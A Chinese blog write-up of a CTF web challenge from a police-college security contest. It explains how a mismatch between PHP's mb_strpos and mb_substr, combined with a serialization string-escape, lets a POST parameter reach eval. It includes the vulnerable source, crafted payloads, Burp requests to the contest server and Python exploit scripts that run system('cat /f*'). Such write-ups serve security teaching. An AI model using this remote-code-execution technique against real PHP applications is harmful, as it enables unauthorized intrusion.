Web-逃跑大师--第二届黄河流域公安院校网络空间安全技能邀请赛

已于 2024-05-20 21:27:34 修改
阅读量260 收藏 1
点赞数 2
分类专栏: 第二届黄河流域公安院校网络空间安全技能邀请赛 文章标签: 前端 安全
于 2024-05-19 18:20:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/139046383
版权
一、题目
题目:逃跑大师
题目描述:
二、WriteUp
1. 分析php源码

<?php
highlight_file(__FILE__);
error_reporting(0);
# vuln函数
function substrstr($data)
{
    $start = mb_strpos($data, "[");
    $end = mb_strpos($data, "]");
    return mb_substr($data, $start, $end + 1 - $start);
}
class A{
    public $A;
    public $B = "HELLO";
    public $C = "!!!";
    public function __construct($A){ #类的构造函数,创建对象时触发
        $this->A = $A; #this代表当前对象,->A代表对象的A属性
    }
    public function __destruct(){ #类的析构函数,对象被销毁时触发
        #当一个对象不再被任何引用变量和程序上下文所持有时,PHP 垃圾回收机制会自动将其销毁并释放其占用的内存。
        $key = substrstr($this->B . "[welcome sdpcsec" .$this->C . "]");
        # HELLO[welcome sdpcsec!!!]
        # $key=welcome sdpcsec!!!
        echo $key;
        eval($key);
    }
}
if(isset($_POST['escape'])) { //用于检查是否存在名为 'escape' 的键值对应的表单数据
    $Class = new A($_POST['escape']);#执行__construct函数,将$_POST['escape'] 的值用作参数
    $Key = serialize($Class); #序列化
    $K = str_replace("SDPCSEC", "SanDieg0", $Key);#将"SDPCSEC"替换为"SanDieg0"
    unserialize($K);#反序列化后释放对象执行__destruct函数
}
else{
    echo "nonono";
}

2. mb_substr和mb_strpos函数漏洞
mb_strpos() 和 mb_substr() 是 PHP 中用于处理多字节字符的函数,专门用于处理 UTF-8 或其他多字节编码的字符串。
(1)mb_strpos: 用于查找一个字符串在另一个字符串中第一次出现的位置(索引),返回结果是该子字符串第一次出现的位置(索引)。
mb_strpos(string $haystack, string $needle, int $offset = 0, string $encoding = null): int|false
    $haystack:要在其中搜索子字符串的源字符串。
    $needle:要搜索的子字符串。
    $offset(可选):从哪个位置开始搜索,默认为 0$encoding(可选):要使用的字符编码,默认为内部字符编码。

(2)mb_substr: 用于获取一个字符串的子串,返回结果是指定位置和长度的子字符串。
mb_substr(string $string, int $start, int $length = null, string $encoding = null): string|false
    $string:要截取的原始字符串。
    $start:截取的起始位置。如果是负数,则表示从末尾开始计数。
    $length(可选):要截取的长度。如果未指定,则默认截取至字符串的末尾。
    $encoding(可选):要使用的字符编码,默认为内部字符编码。


当以 \xF0 开头的字节序列出现在 UTF-8 编码中时,通常表示一个四字节的 Unicode 字符。这是因为 UTF-8 编码规范定义了以 \xF0 开头的字节序列用于编码较大的 Unicode 字符。
不符合4位的规则的话,mb_substr和mb_strpos执行存在差异:
(1)mb_strpos遇到\xF0时,会把无效字节先前的字节视为一个字符,然后从无效字节重新开始解析
mb_strpos("\xf0\x9fAAA<BB", '<'); #返回4 \xf0\x9f视作是一个字节,从A开始变为无效字节 #A为\x41  上述字符串其认为是7个字节

(2)mb_substr遇到\xF0时,会把无效字节当做四字节Unicode字符的一部分,然后继续解析
mb_substr("\xf0\x9fAAA<BB", 0, 4); #"\xf0\x9fAAA<B" \xf0\x9fAA视作一个字符 上述字符串其认为是5个字节

结论:mb_strpos相对于mb_substr来说,可以把索引值向后移动

3. mb_substr和mb_strpos函数漏洞与本题结合
通过控制C的长度可以控制我们想要执行$key的长度
通过控制B我们可以控制索引值需要提前几位
每发送一个%f0abc,mb_strpos认为是4个字节,mb_substr认为是1个字节,相差3个字节
每发送一个%f0%9fab,mb_strpos认为是3个字节,mb_substr认为是1个字节,相差2个字节
每发送一个%f0%9f%9fa,mb_strpos认为是2个字节,mb_substr认为是1个字节,相差1个字节

简化源代码 控制$B$C得到我们想要的$key

<?php
    error_reporting(0);
    function substrstr($data)
    {
        $start = mb_strpos($data, "[");#如果$data中包含%f0则会导致相对mb_substr $start索引值要大
        $end = mb_strpos($data, "]");
        return mb_substr($data, $start, $end + 1 - $start);
    }

    $B = "\xf0abc";
    $C = "1234567890";
    $key = substrstr($B . "[welcome sdpcsec" .$C . "]"); #截取的是[welcome sdpcsec]
    echo $key."\n"; #$key=lcome sdpcsec1234567890]
?>

可以看到
每发送一个\xf0abc就会向后3个字节截取
每发送一个\xf0\9fab就会向后2个字节截取
每发送一个\xf0\x9f\x9fa就会向后1个字节截取
[welcome sdpcsec的长度为16,则须发送3*5+1*1(当然还有其他组合方式,如2*8)$B = "\xf0abc\xf0abc\xf0abc\xf0abc\xf0abcd\xf0\x9f\x9fa";
这样$key的值即1234567890],这样可使$C为我们的执行代码

eval函数用于执行php代码,那么可以构造system函数然后使用//或#注释掉后面内容
那么 $C = "system(\"ls\");//"."]";

<?php
    error_reporting(0);
    $C = "system(\"calc.exe\");//"."]";
    eval($C);#eval("system("calc.exe");//]");
    $C = "system(\"calc.exe\");#"."]";
    eval($C);#eval("system("calc.exe");#]");
?>

4. 使用burpsuite发包
#这里使用GET方式改为POST方式时,需要添加Content-Type: application/x-www-form-urlencoded
这时候我们可以看到执行到了我们想要的执行结果

POST / HTTP/1.1
Host: 47.98.247.113:1111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

escape=1

5. 简化php源码 进行调试
#这里最好用phpstorm进行调试,由于无phpstorm环境,使用vscode手动调试

<?php
    function substrstr($data)
    {
        $start = mb_strpos($data, "[");
        $end = mb_strpos($data, "]");
        return mb_substr($data, $start, $end + 1 - $start);
    }

    class A{
        public $A;
        public $B = "HELLO";
        public $C = "!!!";
        public function __construct($A){ 
            $this->A = $A; 
        }
        public function __destruct(){ 
            #执行两次,使用了全局变量:如果在对象中使用了全局变量,当脚本结束时全局变量的生命周期结束,这也可能导致 __destruct 方法被调用多次
            echo "B:".$this->B."\n";
            echo "C:".$this->C."\n";
            $key = substrstr($this->B . "[welcome sdpcsec" .$this->C . "]");
            echo $key;
            //eval($key);
        }
    }

    $escape = "123";
    $Class = new A($escape);
    $Key = serialize($Class); 
    echo $Key."\n";#O:1:"A":3:{s:1:"A";s:3:"123";s:1:"B";s:5:"HELLO";s:1:"C";s:3:"!!!";}
    $K = str_replace("SDPCSEC", "SanDieg0", $Key);#字符串逃逸点 7个字节会变为8个字节
    unserialize($K);
?>

O:1:"A":3:{s:1:"A";s:3:"123";s:1:"B";s:5:"HELLO";s:1:"C";s:3:"!!!";}

O:1:"A":3:{} 表示这是一个 PHP 对象(Object),其类名为 "A",包含 3 个属性。
#属性名+值
s:1:"A";s:3:"123"; 表示对象的第一个属性名为 "A",其值为字符串 "123"。
s:1:"B";s:5:"HELLO"; 表示对象的第二个属性名为 "B",其值为 "HELLO"。
s:1:"C";s:3:"!!!"; 表示对象的第三个属性名为 "C",其值为 "!!!"
反序列化的特点:
(1)反序列化以;}结束,其后的内容不影响正常的反序列化;
(2)属性值的内容是根据其前面代表字符串长度的整数判断的;
#序列化字节流其实是字符串,所以可以拼接进行改变

根据(1)可以让A的值中包含;}而让反序列化提前结束,并且输入自定义的B和C的序列化内容进而控制B和C
根据(2)通过字符串替换可以让A的值的长度变长,这样后面构造的B和C的序列化内容就可以正常被反序列化,进而达到可以控制B和C的内容

那么我们payload的构成就应该是
#O:1:"A":3:{s:1:"A";s:3:"
valueA";s:1:"B";s:5:"valueB";s:1:"C";s:3:"valueC";}
#其中valueA为若干个"SDPCSEC"组成,然后个数=len(payload)-len(valueA)
也就是";s:1:"B";s:5:"valueB";s:1:"C";s:3:"valueC";}的长度

6. 最终payload
valueA";s:1:"B";s:5:"\xf0abc\xf0abc\xf0abc\xf0abc\xf0abcd\xf0\x9f\x9fa";s:1:"C";s:3:"system(\"ls\");//]";}

7. exp

(1)官方wp

import os
import re
import requests

#URL编码 这里他是直接编码后从burpsuite中发送,所以要把空格url编码
def encode(string):
    encode_string = ""
    for char in string:
        encode_char = hex(ord(char)).replace("0x","%") 
        #ord()将一个字符(char)转换为对应的 Unicode 码点(整数)
        encode_string += encode_char
    return encode_string

#exp
def payload(cmd):
    key = encode(cmd)
    print("url加密:"+encode(cmd))
    s = len(cmd)
    payload1 = '";s:1:"B";s:29:"%f0abcd%f0abcd%f0abdc%f0abcd%f0abdc%f0%9f%9fa";s:1:"C";s:'+ str(s) + ':"' + cmd + '";}'
    payload2 = ""
    print(len(str(payload1)))
    print(len(payload1)-16)
    for i in range(len(payload1)-16):
        payload2 += 'SDPCSEC'
    payload2 = payload2 + payload1
    payload3 = str.replace(payload2, cmd, key)
    print("结果:"+payload3)

pay = "system('cat /f*');//"
exp=payload(pay)

POST / HTTP/1.1
Host: 47.98.247.113:1111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 735

escape=SDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSECSDPCSEC";s:1:"B";s:29:"%f0abcd%f0abcd%f0abdc%f0abcd%f0abdc%f0%9f%9fa";s:1:"C";s:20:"%73%79%73%74%65%6d%28%27%63%61%74%20%2f%66%2a%27%29%3b%2f%2f";}

(2)自己的exp 官方wp太冗长

import requests

url="http://127.0.0.1:1111"

# 统一转换为字节流再进行拼接,不能字符串和字节流进行拼接,否则python会解析错误
value_B = b"\xf0abc\xf0abc\xf0abc\xf0abc\xf0abc\xf0\x9f\x9fa"
value_C = "system(\"cat /flag*\");//]"

payload_part1 =f'";s:1:"B";s:{len(value_B)}:"'.encode('utf-8')
payload_part2 = value_B
payload_part3 = f'";s:1:"C";s:{len(value_C)}:"{value_C}";}}'.encode('utf-8')
#在f-string中{{ 表示输出一个左大括号 {,}} 表示输出一个右大括号 }

value_A = ("SDPCSEC" * len(payload_part1 + payload_part2 + payload_part3)).encode('utf-8')
payload = value_A + payload_part1 + payload_part2 + payload_part3

data = {'escape': payload}
response = requests.post(url, data=data)
print(response.text)
三、总结
1. 参考链接
#Joomla:PHP Bug引入多个XSS漏洞
https://www.sonarsource.com/blog/joomla-multiple-xss-vulnerabilities/
#php反序列化漏洞(万字详解)
https://blog.csdn.net/m0_73185293/article/details/131353031

2. tips
(1)python发送字节流又发送字符串时,应先把字符串转换为字节流再进行拼接,否则会报错。
(2)mb_substr和mb_strpos函数执行差异
(3)对序列化字符串进行filter、replace等操作,一般为反序列化字符串逃逸
(4)后期需要学习phpstorm+xdebug的调试方法
Sa1nZen
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黄河流域水-能源复合生态效率评价及影响因素研究-论文
07-08
水资源短缺与能源富集是影响黄河流域生态效率主要因素。采用Malmquist-Luenberger指数,以全社会用水量、能源消费量等作为生态投入,考虑森林覆盖率等生态期望产出以及二氧化碳排放、废水排放量等环境非期望产出,测度中国省级层面水—能源复合生态效率。以2004—2017年黄河流域9个省份为样本进行研究,并与全国总体水平、长江经济带11个省份进行比较,结果表明:①黄河流域生态效率总体低于全国和长江经济带,但2011年以来迅速改善,2017年生态效率高于全国及长江经济带;②黄河流域内部生态效率差异明显,2017年黄河流域生态效率大体呈斜“川”型,东、西部用水效率较高,中部除宁夏外生态效率较低;③环境库兹尼茨曲线检验显示黄河流域、全国总体、及长江经济带生态效率与经济增长存在显著的“U”型关系,提高人均GDP对于黄河流域生态效率改善最为明显;④环境压力模型检验显示黄河流域生态效率主要受规模效应和结构效应的影响,生态效率与经济发展水平、人均耕地面积、产业结构升级指数、制造业占比正相关而与矿产资源储量指数等微弱负相关。
黄河流域煤炭高质量发展研究-论文
07-08
黄河流域内能源品种众多,煤炭在黄河流域的核心和保障地位不可动摇。黄河流域煤炭资源丰富,生态环境脆弱且承载力有限。通过梳理黄河流域煤炭资源赋存情况、原煤产量、产能规模及煤矿井型等主要特征指标,结合黄河流域水资源、水环境、地表植被、水土流失与水土保持、生态功能区划现状,以黄河二级子流域及内流区为基本范围,综合省市行政区划范围、煤炭矿区集中度和生态环境共性特点,合理划分出黄河流域分区研究单元。并在此基础上,分析黄河流域煤炭开发与自然生态环境之间的关系,总结黄河流域煤炭高质量发展所面临的问题,提出黄河流域煤炭高质量发展的具体举措和政策建议。
黄河流域能源-经济-环境协同发展的实证研究-论文
07-08
能源-经济-环境协同发展是破解资源稀缺难题、改善生态环境和实现经济可持续高质量发展的关键途径。构建能源-经济-环境指标体系,基于黄河流域9省(区) 的面板数据,实证研究了黄河流域能源、经济与环境三系统的发展状况、协调关系及其关联度。结果表明:①各子系统发展水平小幅波动频繁,总体保持较为稳定的发展状态,但区域差异明显;②各省(区) 的能源-经济-环境系统的耦合度均较高,耦合协调度则普遍偏低,多处于低水平耦合的发展阶段,但整体呈现提升优化趋势;③环境因素与系统耦合协调度的关联性最强,能源与经济子系统次之。为进一步促进黄河流域能源-经济-环境协同发展,我国需要制定差异化发展战略,促进区域内要素流通与汇聚,重视生态文明常态化建设。
黄河流域3E 系统耦合协调发展评价与分析-论文
07-08
能源、经济和生态环境相辅相成,它们之间的耦合协调发展评价可为地区实现可持续发展提供政策参考。基于2005—2017年黄河流域流经9个省(区) 的数据,构建能源-经济-环境(3E)系统耦合协调发展评价体系,利用综合赋权法和耦合协调评价模型对其进行测算。结果表明:黄河流域能源、经济与环境之间的协调发展仍然存在矛盾;2005—2017年,黄河流域3E系统耦合协调发展呈现出从勉强协调到高度协调趋势,不同子系统之间存在显著差异;9省(区) 3E系统耦合协调发展也呈现出勉强协调到高度协调的时间演化趋势;从空间差异视角分析,黄河流域3E系统耦合协调发展仅处于勉强协调水平,且呈现显著的省(区) 差异,其中,青海省、四川省3E系统耦合协调发展处于中度协调水平,远高于其他省(区)。
黄河流域典型矿区生态空间网络优化研究——以鄂榆地区为例-论文
07-07
黄河流域是我国重要的生态屏障,同时分布着我国多数大型煤炭生产基地,是我国重要的能源基地。如何保障黄河流域煤矿开采与生态环境的协同发展,建设黄河流域生态文明,是当前研究的重要课题。选取黄河流域典型矿区—鄂榆矿区为研究区,基于复杂系统与景观生态理论,结合景观生态风险评价与复杂网络分析两种方法,从宏观角度探究矿区生态修复策略。首先对研究区进行潜在复杂生态网络的提取与景观格局生态风险评价;然后识别研究区潜在复杂生态网络中处于中高生态风险区且其度中心性较低的生态节点,进而基于复杂网络增边优化理论,结合研究区当地的矿区与景观分布情况,进行模拟增边优化,最后通过对比分析模拟增边优化前后研究区潜在复杂生态网络的鲁棒性,验证模拟增边优化的效果。得出结果:中高生态风险区域主要分布在南部、北部的耕地区域与东北部的矿区;提取得到潜在复杂生态网络生态源地共77个,生态节点109个,生态廊道193条;识别增边优化节点共10个,最终成功为其中7个节点进行模拟增边共6条,另有3个节点模拟增边失败;模拟增边优化后,网络的连接鲁棒性较优化前有显著提升,网络的节点恢复鲁棒性与边恢复鲁棒性略有提升。从结果来看,模拟增边优化能
Web-myfavorPython--第二届黄河流域公安院校网络空间安全技能邀请赛
Sa1nZen的博客
05-19 169
Web-myfavorPython--第二届黄河流域公安院校网络空间安全技能邀请赛
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
Sa1nZen的博客
05-19 219
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
黄河流域公安院校网络空间安全技能挑战赛 QAQ 题解
OrientalGlass的博客
03-05 592
这题是对python打包成的可执行程序逆向。
第二届黄河流域网络安全技能挑战赛WP
How2Badlion的博客
05-13 926
TIP:可以留言给我换友链捏 第一次打ctf 之前只会做服务器取证 不知道为什么就第二了 可能运气比较好吧 由于我自己目前在取证工作中,也遇到很多ctf的问题,我个人非常喜欢做ctf的题目,但也会遇到ctf问题难以破解,全网ctf教程我都看完了,但是都觉得不够具体,所以我写一篇博客,希望以最具体的,实操演示的方式,向大家说明ctf的原理,希望与大家一起进步!
黄河流域公安院校网络空间安全技能挑战赛】部分wp
leekos的博客,分享web安全相关知识~
03-07 866
黄河流域公安院校网络空间安全技能挑战赛】部分wp
python气象可视化第二弹-黄河流域白化
weixin_43347581的博客
06-10 3584
maskout是比较python+cartopy实现白化功能的一个比较好用的子程序。(1)在应用的过程中要注意相关的shp文件应该是地理坐标系,如果不是的话要转化坐标系。(详情参考:如何使用arcmap转换shp文件坐标系)(2)注意选择合适的region,尽量选择具有代表性的record。...
黄河流域公安院校网络空间安全技能挑战赛
qq_63928796的博客
03-04 360
里让b为真就可以调用c中的sdpc方法,参数是welcom,再利用A类可以调用Evil中的getflag。将一句话木马包含在日志里并写到test.php中。php7.4有一个源码泄露的漏洞。pearcmd的利用,日志包含。考察PHP 的运算符比较级。
Google Earth Engine(GEE)——2000-2020年RSEI分析(MODIS数据)以黄河流域为例
qq_31988139的博客
03-14 6011
文中使用的数据:MOD09A1、MOD11A2和MOD13A1 代码: var MOD09A1 = ee.ImageCollection("MODIS/006/MOD09A1"), MOD11A2 = ee.ImageCollection("MODIS/006/MOD11A2"), MOD13A1 = ee.ImageCollection("MODIS/006/MOD13A1"), table = ee.FeatureCollection("users/..
全国大学生GIS应用技能大赛2023-12
lntu_ling
11-04 562
为了计算不同高程区间范围内流域的面积,要求根据提供的DEM数据,按照要求,计算不同高程区间范围内流域的面积。利用9中得到的结果来标识7中得到的结果,得到流域数据的高程区间。创建图表,显示不同区间的面积,并将图表插入专题图中。在10中得到的结果中添加面积字段,计算面积。根据提供的数字高程模型,1、提取流域。利用流向数据和河流连接数据计算流域栅格。1、DEM:某地区的数字高程模型;对DEM数据根据高程区间进行重分类。2、统计不同流域范围内流域面积。将6计算的结果转成矢量数据。将8的结果转成矢量数据。
记录一次前端页面崩溃的产生及处理
最新发布
weixin_51123079的博客
05-30 506
记录一次前端页面崩溃的产生及处理
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
山花的博客
05-30 516
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
web前端三大主流框架
低调做人,低调编码,神码都是浮云
05-30 938
Web前端三大主流框架介绍:Angular、React、Vue
【JS实战案例汇总——不定时更新版】
微木
05-30 334
练习JS的实用案例,倒计时算法、定时轮播图
Flutter 中的 SizeChangedLayoutNotifier 小部件:全面指南
smileKH的博客
05-28 535
是一个混合了和行为的布局小部件。它允许子组件在尺寸变化时发送通知,而其他组件可以订阅这些通知来响应尺寸变化。
hec-hms的单元流域模型如何划分子流域
05-25
HEC-HMS的单元流域模型可以通过以下步骤来划分子流域: 1. 确定主要的水文特征:首先需要考虑流域的水文特征,如坡度、土壤类型、降雨分布等。这些特征可以帮助确定流域内的水文过程和水文响应。 2. 划分子流域:根据主要的水文特征,可以将整个流域划分为若干个子流域。一般情况下,子流域应该是相对独立的,并且各自具有一定的水文特征。可以使用HEC-GeoHMS工具来辅助进行子流域划分。 3. 确定每个子流域的出口点:每个子流域都应该有一个出口点,即水流汇聚的地方。这些出口点可以是河流的交汇处、湖泊或水库的出口点等。在HEC-HMS中,可以使用“Junction”对象来表示出口点。 4. 确定每个子流域的参数:每个子流域都应该有一些参数,如面积、坡度、土壤类型、植被覆盖率等。这些参数可以通过现场调查和遥感数据来获取。在HEC-HMS中,可以使用“Subbasin”对象来表示子流域,并设置其相应的参数。 5. 连接子流域:将所有子流域和出口点连接起来,形成整个流域的模型。在HEC-HMS中,可以使用“Reach”对象来表示连接子流域的各个河段,并设置其相应的参数。 通过以上步骤,可以构建出一个基于HEC-HMS的单元流域模型,用于模拟流域内的水文过程和水文响应。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值